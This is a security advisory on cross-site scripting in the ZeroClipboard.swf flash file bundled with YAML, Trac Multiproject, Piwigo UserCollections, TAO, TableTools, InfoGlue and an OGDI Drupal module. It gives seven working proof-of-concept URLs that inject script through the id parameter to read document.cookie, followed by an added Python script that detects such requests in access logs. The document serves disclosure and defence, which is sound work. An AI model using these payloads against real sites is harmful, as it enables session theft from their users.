Various Applications Include ZeroClipboard XSS

20 Feb 2013 00:00:00. Reported by MustLive. Type: packetstorm. Source: packetstormsecurity.com

Cross-Site Scripting vulnerabilities in applications that bundle ZeroClipboard, such as YAML, MultiProject for Trac, UserCollections for Piwigo, TAO, and the TableTools jQuery plugin (with ZeroClipboard.swf). Vulnerable web applications need to update to the fixed version 1.1.7 of ZeroClipboard.swf.

Code
Hello list!  
  
These are Cross-Site Scripting vulnerabilities in YAML, MultiProject  
extension for Trac, UserCollections extension for Piwigo, TAO and TableTools  
plugin for DataTables plugin for jQuery (with ZeroClipboard.swf).  
  
Earlier I wrote about Cross-Site Scripting vulnerabilities in  
ZeroClipboard (http://seclists.org/fulldisclosure/2013/Feb/103). I wrote  
that this is a very widespread flash file and it's placed at tens of thousands  
of web sites. And it's used in hundreds of web applications. Among them are  
YAML, Multiproject for Trac, UserCollections for Piwigo, TAO and TableTools  
for DataTables for jQuery. And there are many other vulnerable web  
applications with ZeroClipboard.  
  
-------------------------  
Affected products:  
-------------------------  
  
The following web applications with ZeroClipboard are vulnerable:  
  
YAML 4.0.2 and previous versions.  
  
Multiproject extension for Trac: Multiproject 1.4.21 and previous versions.  
  
UserCollections extension for Piwigo.  
  
TAO 2.3.1 and previous versions.  
  
TableTools plugin for DataTables plugin for jQuery. In particular, it's  
bundled with InfoGlue 2.1 (and previous versions) and OGDI Field 6.x-1.0  
(and previous versions) for Drupal.  
  
Both XSS vulnerabilities in ZeroClipboard are fixed in the latest version (by  
the new developers), such as ZeroClipboard 1.1.7. All developers should update  
the swf file in their software.  
  
----------  
Details:  
----------  
  
Cross-Site Scripting (WASC-08):  
  
XSS via id parameter and XSS via copying payload into buffer (as described  
in previous advisory).  
  
YAML:  
  
http://site/yaml/docs/assets/js/snippet/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height  
  
Multiproject extension for Trac:  
  
http://site/themes/default/htdocs/flash/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height  
  
UserCollections extension for Piwigo:  
  
http://site/piwigo/extensions/UserCollections/template/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height  
  
TAO:  
  
http://site/filemanager/views/js/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height  
  
TableTools plugin for DataTables plugin for jQuery:  
  
http://site/path/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height  
  
InfoGlue:  
  
http://site/script/jqueryplugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height  
  
OGDI Field for Drupal:  
  
http://site/sites/all/modules/ogdi_field/plugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua   
  
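The advisory above shows the vector: a ZeroClipboard.swf request whose `id` query parameter carries script instead of an element id. The following is an added detection example, not part of the advisory, that flags such requests in ordinary web-server access logs; the log lines are constructed, and it assumes a legitimate `id` is a plain DOM element id made of letters, digits, hyphens and underscores.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Common Log Format); not from the advisory.
# The second line carries a percent-encoded form of the advisory's payload shape.
SAMPLE_LOG = """\
203.0.113.5 - - [20/Feb/2013:10:01:02 +0000] "GET /yaml/docs/assets/js/snippet/ZeroClipboard.swf?id=copy-btn&width=100&height=20 HTTP/1.1" 200 2780
203.0.113.9 - - [20/Feb/2013:10:01:05 +0000] "GET /yaml/docs/assets/js/snippet/ZeroClipboard.swf?id=%5C%22))%7Dcatch(e)%7B%7Dif(!self.a)self.a=!alert(document.cookie)//&width&height HTTP/1.1" 200 2780
203.0.113.7 - - [20/Feb/2013:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 512
"""

# Pull method and request target out of the quoted request line.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Assumption: a legitimate ZeroClipboard id is a DOM element id (letters,
# digits, '-', '_'). Quotes, braces, parentheses and slashes never belong there.
SAFE_ID = re.compile(r'^[A-Za-z0-9_-]+$')


def suspicious_zeroclipboard_requests(log_text: str) -> list:
    """Return one record per request to ZeroClipboard.swf whose id is not a plain element id."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        # Match any deployment path: the advisory lists seven different locations.
        if not parts.path.lower().endswith("zeroclipboard.swf"):
            continue
        # parse_qs percent-decodes, so encoded quotes and braces become visible.
        ids = parse_qs(parts.query, keep_blank_values=True).get("id", [])
        bad = [v for v in ids if not SAFE_ID.match(v)]
        if bad:
            hits.append({"path": parts.path, "id": bad[0], "line": line})
    return hits


if __name__ == "__main__":
    for hit in suspicious_zeroclipboard_requests(SAMPLE_LOG):
        print(f"suspicious id on {hit['path']}: {hit['id']!r}")
```

A clean id such as `copy-btn` passes; the encoded payload line is reported with its decoded `id`, which is what an analyst wants to see when triaging. An up-to-date ZeroClipboard.swf (1.1.7 or later) is still the fix; this only tells you whether anyone is probing the old one.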
